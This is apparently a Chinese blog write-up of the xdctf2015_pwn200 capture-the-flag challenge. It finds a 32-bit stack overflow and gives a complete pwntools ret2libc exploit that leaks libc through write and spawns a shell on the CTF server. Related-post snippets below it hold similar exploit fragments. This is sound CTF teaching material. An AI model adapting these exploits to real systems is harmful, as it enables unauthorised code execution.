xdctf2015_pwn200

最新推荐文章于 2022-03-03 19:08:39 发布
原创 最新推荐文章于 2022-03-03 19:08:39 发布 · 1.8k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

这篇博客讲述了作者通过checksec和IDA工具分析,发现了一个简单的栈溢出漏洞。通过构造payload,成功利用write地址泄漏libc,并进一步利用system调用执行shell。详细步骤包括设置payload、远程连接、利用ELF和got表进行攻击,最终实现交互式控制台。

xdctf2015_pwn200.py

使用checksec查看:
在这里插入图片描述
只开启了栈溢出。

拉进IDA中查看:
在这里插入图片描述
main()中直接给出了漏洞函数,跟进查看:
在这里插入图片描述
一个简单明了的栈溢出。距离ebp0x6c

write()函数泄露libc。

exp:

from pwn  import *

#start 
r = remote("node4.buuoj.cn",27929)
# r = process("../buu/xdctf2015_pwn200")
elf = ELF("../buu/xdctf2015_pwn200")
libc = ELF("../buu/ubuntu16(32).so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

#attack
payload = b'M'*(0x6c+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.recv()
r.sendline(payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = b'M'*(0x6c+4) + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
r.recv()
r.sendline(payload)

r.interactive()
xdctf-pwn200-附件资源
03-05
xdctf-pwn200-附件资源
xdctf2015前20名writeup
10-07
2015xdctf前20名的writeup,绝对不坑
XDCTF2015 PWN200
Bill
03-01 1939
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
[BUUCTF]PWN——xdctf2015_pwn200
mcmuyanga的博客
11-11 1569
xdctf2015_pwn200 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数 vuln函数 参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法 利用过程: 先用write函数泄露libc版本 payload='a'*(0x6c+4) #溢出到ret payload+=p32(wri
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1730
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显栈溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
CTF--2015中国西安电子科技大学XDCTF网络安全大赛之pwn
关注互联网安全的小虾米一枚
09-19 4746
write up 0x01 基本信息 本人初学,可能本题解答对大神来说,有些繁琐。(大神可以忽略飘过)。 分享在此,方便自己,也方便他人。 文件: xd_jwxt 大小: 8276 字节 修改时间: 2016年7月13日, 16:22:24 MD5: 07BE390A9328A365549A27D400462B59 SHA1: C0175B97E12670373
(攻防世界)(XDCTF-2015pwn200
PLpa的博客
07-13 2358
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.youkuaiyun.com/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 362
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
xdctf-pwn200
Vccxx的博客
04-08 1438
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
SCTF 2015 pwn试题分析
weixin_30819163的博客
05-11 228
Re1 是一个简单的字符串加密。程序使用了多个线程,然后进行同步。等加密线程加密好了之后才会启动验证线程。这个题比较坑的是IDA F5出来的结果不对,不知道是不是混淆机制。 刚开始看的是F5后的伪代码,一脸懵逼。后来看了下汇编才明白是怎么回事。 解密直接打表就可以,也可以写逆算法。 pwn1 用checksec看了一下保护机制,有canary+nx保护。漏洞是一个简单的栈溢出,但是...
XDCTF coding200
blackcat
10-08 784
之前在某项目中实现过了=0=
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 750
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
sctf pwn200
weixin_30363981的博客
04-04 296
  题目给出了pwn200和libc.so。使用IDA查看程序,发现逻辑很简单。   使用checksec查看pwn200安全属性,如下图:      发现NX enabled,No PIE。   在第一次读(0x08048524位置)的时候,可以读取17个字节,观察栈结构:   发现可以将nbytes覆盖,可以覆盖为0xff。   在第二次读(0x08048596位置)的时候,...
[XCTF-pwn] 7-forgot 14-xdctf-pwn-200
weixin_52640415的博客
03-03 210
有后门cat flag 直接在溢出后写入后门地址即可 from pwn import * p = remote('111.200.241.244', 56567) system = 0x80486cc p.sendlineafter(b"> ", b'1') p.sendlineafter(b"> ", b'0@0.'+ b'a'*28 + p32(system)*10) print(p.recv()) p.interactive() ...
攻防世界 XDCTF-2015WP(萌新版)
TedLau的博客
04-03 344
from pwn import * r=process('./pwn200') elf=ELF('pwn200') write_plt=elf.plt['write'] read_plt=elf.plt['read'] start_addr=0x80483d0 func_addr=0x08048484 ppp_addr=0x0804856c def leak(addr): ...
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-19 458
题目下载地址:点此下载 查保护 只开启了NX 查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。 这题比较简单,就不写详细解释了,直接上EXP。 EXP: # -*- coding: utf-8 -*- # @Author: 夏了茶糜 # @Date: 2020-03-19 14:01:14 # @email: sxin0807@qq.com # @Las...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值